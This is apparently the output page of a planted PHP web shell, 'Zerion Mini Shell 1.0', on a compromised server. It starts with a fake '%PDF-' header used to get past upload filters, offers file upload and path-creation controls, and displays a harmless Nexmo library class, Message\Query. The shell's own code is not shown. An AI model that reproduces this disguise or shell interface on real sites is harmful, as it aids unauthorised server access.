%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/html/o91-api/vendor/nexmo/client/src/Message/
Upload File :
Create Path :
Current File : /var/www/html/o91-api/vendor/nexmo/client/src/Message/Query.php

<?php
namespace Nexmo\Message;

class Query
{
    protected $params = [];

    public function __construct(\DateTime $date, $to)
    {
        $this->params['date'] = $date->format('Y-m-d');
        $this->params['to']   = $to;
    }

    public function getParams()
    {
        return $this->params;
    }
}

Zerion Mini Shell 1.0